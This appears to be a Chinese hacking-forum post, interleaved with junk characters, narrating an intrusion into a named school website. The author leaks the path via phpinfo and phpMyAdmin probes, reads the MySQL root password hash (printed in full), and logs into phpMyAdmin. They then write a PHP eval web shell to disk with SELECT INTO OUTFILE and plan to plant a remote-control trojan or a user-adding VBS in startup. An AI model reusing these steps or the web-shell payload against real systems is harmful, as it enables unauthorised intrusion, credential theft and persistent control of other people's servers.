3、magic_quotes_gpc()=OFF
; R# v: b$ Z0 \! F1 s" ?0 E% |. O2 `5 Y% Y, [8 b9 ]5 B
试着爆绝对路径:
/ p# ]2 o% R- p1 [1./phpMyAdmin/index.php?lang[]=1
' \- e1 i. E2 c. @1 X/ E
2./phpMyAdmin/phpinfo.php
1 ^6 r+ S- ~) |# O* \1 O3./load_file()
: o) v: D% t$ @# w: O! C* F
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
7 R+ n1 n' F# b6 G. v5./phpmyadmin/libraries/select_lang.lib.php
2 T) Y4 L: c& M
6./phpmyadmin/libraries/lect_lang.lib.php
0 f" ^* ^3 g# G" e7./phpmyadmin/libraries/mcrypt.lib.php
+ A6 M; `: _$ ^, Y9 _7 V% O) e
8./phpmyadmin/libraries/export/xls.php
" Q$ w2 M% r& m v* d: T; ~; c; o* |. {2 x
均不行...........................
1 n* [8 {0 `8 B9 W! [! m# J. c1 Y+ ^* v7 ?0 |8 T2 E
御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
8 o8 m3 y" }7 y' r1 Q' r6 h, V! e2 h9 o/ J( [8 F: J
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( P& }- I/ @- }
$ Z5 R$ s& p; F% e$ \" b默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
" Z5 g) p9 Q7 |( o
# a8 s6 c! ~' _' W, B' U敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
0 S" P$ n2 v O3 Z3 _9 t% t
2 h% k* i$ r- o; x1 n
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
8 a) |) C5 q: A' u2 }
2 m1 y: p% t# k
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
) Y, M, H8 s4 \6 ?& _) b! l, S. ^$ L
. T# Y2 [" W) E自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
, j8 n8 d5 s) @
0 ?' w5 i3 k$ p% s* h7 ]3 A; E& W
成功读到root密码:
# `) g) Q% m3 Q/ b2 `% U2 D9 ]% \
# A$ d+ S: H0 z9 I# l* Z17---- r(0072)
" w' U! C6 X" C8 V
18---- o(006f)
4 [. l$ H/ z3 p' E& |9 R$ j' Q# |4 F
19---- o(006f)
4 X: s) T0 E5 J* X, y* Y
20---- t(0074)
% H0 l1 {9 V" z6 K4 {
21---- *(002a)
- H# `( [% m! l' S! B( J' @
22---- 8(0038)
$ D6 z4 G: \( Y2 i; d, m, t5 A23---- 2(0032)
. b! t# z/ [; K7 F# e/ \. j$ }! y
24---- E(0045)
& g U% c% g' `6 w) S25---- 1(0031)
* M+ [* s# e* D J+ o6 X# `' a26---- C(0043)
' ~% V2 N3 D- l. z4 y: C$ n; s
27---- 5(0035)
/ d f) Z$ k7 T, c5 N" i4 e
28---- 8(0038)
% v) Y- m; K, c; ~) I. K/ @
29---- 2(0032)
4 s2 v- a, H* a" ?30---- 8(0038)
( Z) }* C1 ~% A/ Q7 F
31---- A(0041)
1 ?! ^8 Z! `+ \; y a' w4 l% Z32---- 9(0039)
1 X& v5 A/ A' a9 q! I
33---- B(0042)
- g- q/ e' U3 M- u" O34---- 5(0035)
: o3 b. s) p+ ~, H6 f1 z$ P9 R35---- 4(0034)
2 b) N: ?; H# P4 g# `' L36---- 8(0038)
1 I. v7 L* \& \' H m3 }/ j
37---- 6(0036)
4 W' `- w$ ~' I38---- 4(0034)
5 c6 i8 K! @( ]5 t
39---- 9(0039)
, S/ j2 y/ m' F40---- 1(0031)
" d- y+ P" I; x- E2 [$ |& Z D# A$ V41---- 1(0031)
# y8 a; F/ j8 i; k1 z$ q42---- 5(0035)
1 J/ [+ {: t, p, Q/ h [' h0 S
43---- 3(0033)
, |' i& [) V" x: n44---- 5(0035)
" C W$ i/ V, ]% r% {
45---- 9(0039)
+ G \6 T0 C$ c5 _, J; v0 N( O
46---- 8(0038)
( R E) P4 C3 Q7 q
47---- F(0046)
; d n9 E: R6 a# q( n0 T% d48---- F(0046)
/ g d% e$ H* r8 [* [% r5 m4 o( j5 W
49---- 4(0034)
. t$ K: j" F2 _" g7 ~ d
50---- F(0046)
?. n ]8 R( W2 g6 F5 U6 \! j1 U
51---- 0(0030)
9 D6 G8 I+ d# y8 N0 {2 U/ E; g3 m! i3 j
52---- 3(0033)
3 f( [# e+ H3 D3 ~7 h. q; e: g! m
53---- 2(0032)
, i9 f% H, }% z$ I8 r% p54---- A(0041)
, P6 B7 j3 ^) z( z! J) N- H55---- 4(0034)
9 N, O* F4 w: p; F56---- A(0041)
% H' t( j! G/ F. k) _57---- B(0042)
4 A' n1 ?- }% n, m; L
58---- *(0044)
% c' B( X% ]/ _9 y
59---- *(0035)
4 G7 E* O" d% k& L60---- *(0041)
# X% J1 k6 }2 q o8 f61---- *0032)
- `* N' k, D! q% }# k: x
* [5 u$ u' o- ?% B: K! o. P解密后成功登陆phpmyamin
L# |. K$ I1 p4 f7 f! e2 G & `5 D! D' P- \) S& f
$ G c1 s9 s" n( h0 N$ f& h
[attach]164[/attach]
! }8 K- N6 n6 m6 ~4 x% e( U
+ n: W5 U& Q8 Y: F) ? @找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
; j1 x+ T; T7 W3 E' y; C
) ]# Y* J& q+ `# R+ c% j
成功执行,拿下shell,菜刀连接:
/ F" C J. D3 M$ l
1 Q2 P- o) L6 l7 ]$ L# \
服务器不支持asp,aspx,php提权无果...................
& N* j+ X. C/ h* l+ E/ ^" p
' _% ~5 G2 w( l但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
, V7 p+ O0 b& N